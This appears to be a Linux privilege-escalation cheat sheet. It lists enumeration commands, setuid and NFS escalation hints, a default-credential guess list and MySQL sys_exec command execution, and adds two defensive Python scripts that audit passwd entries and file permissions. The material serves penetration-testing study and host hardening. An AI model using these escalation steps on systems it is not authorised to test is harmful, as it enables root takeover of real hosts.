```sh
# Print /etc/passwd
cat /etc/passwd

# Print only users who have shell access
cat /etc/passwd | egrep -e '/bin/(ba)?sh'
```
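The `egrep` above only matches `/bin/sh` and `/bin/bash`. The following Python script is an added example (not from the original cheat-sheet) that parses the passwd format properly, lists accounts with an interactive shell against a configurable shell list, and flags any extra UID 0 accounts, which is the check a reviewer of a host wants alongside the shell list. The passwd text and the `INTERACTIVE_SHELLS` set are constructed assumptions, not taken from a real system.

```python
"""Audit an /etc/passwd-style file: interactive-shell accounts and extra UID-0 accounts.
Added example; the sample data below is constructed, not a real system file."""

# Constructed sample in /etc/passwd format (assumption, for the demo only).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:0:0:service account:/var/svc:/bin/sh
"""

# Shells treated as interactive. On a real host, read /etc/shells instead;
# this fixed set is an assumption for the example.
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh",
                      "/usr/bin/bash", "/usr/bin/zsh"}


def parse_passwd(text):
    """Return one dict per entry. Blank and comment lines are skipped;
    a line without exactly 7 colon-separated fields is a parse error."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def shell_users(entries):
    """Names of accounts whose login shell is interactive."""
    return [e["name"] for e in entries if e["shell"] in INTERACTIVE_SHELLS]


def extra_uid0(entries):
    """UID-0 accounts other than root: any hit here needs an explanation."""
    return [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]


def audit_file(path="/etc/passwd"):
    """Run both checks on a real passwd file and return the results."""
    with open(path, encoding="utf-8") as fh:
        entries = parse_passwd(fh.read())
    return {"shell_users": shell_users(entries), "extra_uid0": extra_uid0(entries)}


if __name__ == "__main__":
    ents = parse_passwd(SAMPLE_PASSWD)
    print("interactive shells:", shell_users(ents))
    print("extra UID 0 accounts:", extra_uid0(ents))
```

Run it with no arguments to see the constructed sample; call `audit_file()` on a host to check the real file. The UID 0 check catches the `svc` entry in the sample, which a shell-only grep would list as just another user.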
```sh
# Duh.
sudo su

# View permissions on passwd
ls -l /etc/passwd

# View permissions on shadow
ls -l /etc/shadow

# Check for cron jobs
cat /etc/crontab

# Check for sudo privs
sudo -l

# Check for kernel priv-esc exploits
uname -a
cat /etc/issue

# Check /home permissions
ls -la /home

# Check /root permissions
ls -l /root

# SETUID binaries
## Look for - Nmap, Vim, find, Bash, More, Less, Nano, cp, man
find / -user root -perm -4000 -exec ls -ldb {} \;

# User-writable files (skip /proc; the parentheses must be escaped for the shell)
find / -type f \( ! -path "/proc/*" \) -writable 2>/dev/null | xargs ls -l

# Check for NFS shares
cat /etc/exports
## If writeable, add /root, restart, and mount
```
```text
username:username
username:username1
username:root
username:admin
username:qwerty
username:password
```
```sh
# Check for world-writable files
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2>/dev/null

# Check for world-writable directories
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2>/dev/null

# Look for interesting files:
find / -name "*.txt" -ls 2>/dev/null
find / -name "*.log" -ls 2>/dev/null
```
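The setuid and world-writable `find` commands above (here and in the earlier checklist) test mode bits one at a time. As an added example that is not part of the original notes, the Python script below walks a tree once, prunes `/proc`, `/sys` and `/dev` like the `-prune` clauses, and classifies every path by the same bits (`S_ISUID`, `S_ISGID`, `S_IWOTH`, and the sticky bit that distinguishes a `/tmp`-style directory from a plain world-writable one). It builds a constructed sample tree in a temporary directory so it runs anywhere; the paths and modes in `build_sample_tree` are assumptions for the demo.

```python
"""One-pass permission audit: setuid/setgid binaries and world-writable paths.
Added example; the sample tree below is constructed in a temp dir."""
import os
import stat
import tempfile

# Pseudo-filesystems skipped exactly as the find -prune clauses do.
PRUNE = {"/proc", "/sys", "/dev"}


def classify(st):
    """Return sorted finding tags for one os.lstat() result."""
    tags = set()
    mode = st.st_mode
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            # setuid owned by uid 0 is the interesting case (find -user root -perm -4000)
            tags.add("setuid-root" if st.st_uid == 0 else "setuid")
        if mode & stat.S_ISGID:
            tags.add("setgid-root" if st.st_gid == 0 else "setgid")
        if mode & stat.S_IWOTH:
            tags.add("world-writable-file")
    elif stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
        # sticky bit (/tmp style) limits deletion/rename to the owner; still worth listing
        tags.add("world-writable-dir-sticky" if mode & stat.S_ISVTX else "world-writable-dir")
    return sorted(tags)


def audit_tree(root):
    """Map path (relative to root) -> tags, for every path with at least one finding."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # prune pseudo-filesystems in place so os.walk does not descend into them
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for p in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            try:
                st = os.lstat(p)  # lstat: do not follow symlinks
            except OSError:
                continue
            tags = classify(st)
            if tags:
                findings[os.path.relpath(p, root)] = tags
    return findings


def build_sample_tree():
    """Constructed sample tree (assumption for the demo). Returns its root."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    for d in ("bin", "etc", "tmp"):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), 0o755)

    def touch(rel, mode):
        p = os.path.join(root, rel)
        with open(p, "w") as fh:
            fh.write("x")
        os.chmod(p, mode)

    touch("bin/tool", 0o4755)      # setuid binary
    touch("bin/safe", 0o755)       # ordinary binary
    touch("etc/app.conf", 0o666)   # world-writable config: anyone can edit it
    touch("etc/hosts", 0o644)      # normal config
    os.chmod(os.path.join(root, "tmp"), 0o1777)  # sticky world-writable, like /tmp
    return root


if __name__ == "__main__":
    for path, tags in sorted(audit_tree(build_sample_tree()).items()):
        print(f"{path}: {', '.join(tags)}")
```

Point `audit_tree("/")` at a live host to get the combined view; `setuid-root` entries should be compared against the package manager's list of expected setuid files, and `world-writable-file` entries under `/etc` or in any service's configuration directory are the ones to fix first. When the script runs as an unprivileged user the sample's setuid file is owned by that user, so it is tagged `setuid` rather than `setuid-root`.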
If you find that mysql is running as root and you know the username and password:

```sql
select sys_exec('whoami');
select sys_eval('whoami');
```
```sh
ps -aux | grep root
```

You should be looking for possible local VNC sessions, or localhost processes that could be hijacked, and also for processes that generate files (i.e., call some program). Remember, a program may be running periodically without a cron job (e.g. a Python `while` loop).
```sh
netstat -a | grep -i listen
netstat -ano
ls /etc/rc*
```
After setting the setuid bit on a binary such as bash, you must supply the `-p` flag when running it in order to retain the setuid privileges: